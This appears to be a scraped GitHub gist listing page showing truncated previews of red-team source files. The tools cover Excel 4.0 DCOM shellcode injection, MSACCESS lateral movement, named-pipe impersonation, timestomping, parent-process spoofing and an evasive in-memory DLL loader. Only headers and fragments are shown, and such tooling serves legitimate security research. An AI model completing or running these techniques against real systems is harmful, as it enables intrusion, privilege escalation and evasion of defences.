This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Lateral movement and shellcode injection via Excel 4.0 macros | |
Author: Philip Tsukerman (@PhilipTsukerman) | |
License: BSD 3-Clause | |
Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM | |
#> | |
function Invoke-ExShellcode | |
{ | |
<# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#********************************************************************** | |
# Invoke-Excel4DCOM64.ps1 | |
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support | |
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason | |
# Date: 2019/04/21 | |
# Version: 1.1 | |
#********************************************************************** | |
function Invoke-Excel4DCOM | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Lateral Movement Via MSACCESS TransformXML | |
Author: Philip Tsukerman (@PhilipTsukerman) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
#> | |
function Invoke-AccessXSLT { | |
<# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* Great, this technique is overdone maybe...a billion times | |
* This same technique is used by Metasploit's getsystem() | |
* command in implementation 1 (getsystem -t 1) by forcing | |
* a service to connect to an arbitrary named pipe. | |
* | |
* The technique is abusable given the following conditions: | |
* -> SeImpersonatePrivilege _must_ by enabled, I cannot stress | |
* this enough. Read MSDN, to impersonate other users, you need | |
* this privilege for the call to complete successfully. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Demonstrates "timestomping" using C using Ntdll.Dll function calls. | |
// Authored by Austin Hudson (Mumbai). | |
// Able to be compiled with mingw | |
// x86_64-w64-mingw32-gcc timestomp.c -o timestomp.exe -lntdll | |
#define WIN32_LEAN_AND_MEAN | |
#include <windows.h> | |
#include <winternl.h> | |
#include <ntstatus.h> | |
#include <stdio.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
static int process_spoof(HANDLE ParentHandle, PCHAR ProcessName) | |
{ | |
SIZE_T ThreadSize; | |
STARTUPINFOEXA si; | |
PROCESS_INFORMATION pi; | |
RtlSecureZeroMemory(&pi, sizeof(pi)); | |
RtlSecureZeroMemory(&si, sizeof(si)); | |
InitializeProcThreadAttributeList(NULL, 1, 0, &ThreadSize); | |
si.lpAttributeList = reinterpret_cast<LPPROC_THREAD_ATTRIBUTE_LIST>(HeapAlloc(GetProcessHeap(), | |
HEAP_ZERO_MEMORY, ThreadSize)); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
loader.c - Attemps fully port LoadLibrary() to a position-indepedent | |
vartion to facilitate the self-loading of a DLL and its | |
dependecies, as well as introduce evasive features to reduce | |
memory indicators. | |
Inspiration: | |
ZeroLoad - https://github.com/zerosum0x0/zeroload (zerosum0x0) | |
MemoryModule - https://github.com/fancycode/MemoryModule (fancycode) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdint.h> | |
#include <string.h> | |
#include <stdio.h> | |
#include <stdbool.h> | |
#if _WIN32 || _WIN64 | |
#if _WIN64 | |
typedef uint64_t uint_t; | |
#else |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Data; | |
using System.Data.SqlClient; | |
using System.Data.SqlTypes; | |
using System.Runtime.InteropServices; | |
using Microsoft.SqlServer.Server; | |
public partial class StoredProcedures | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdint.h> | |
#include <stdio.h> | |
#include <string.h> | |
#include <stdlib.h> | |
#include <sys/types.h> | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <errno.h> | |
struct s_config { |
OlderNewer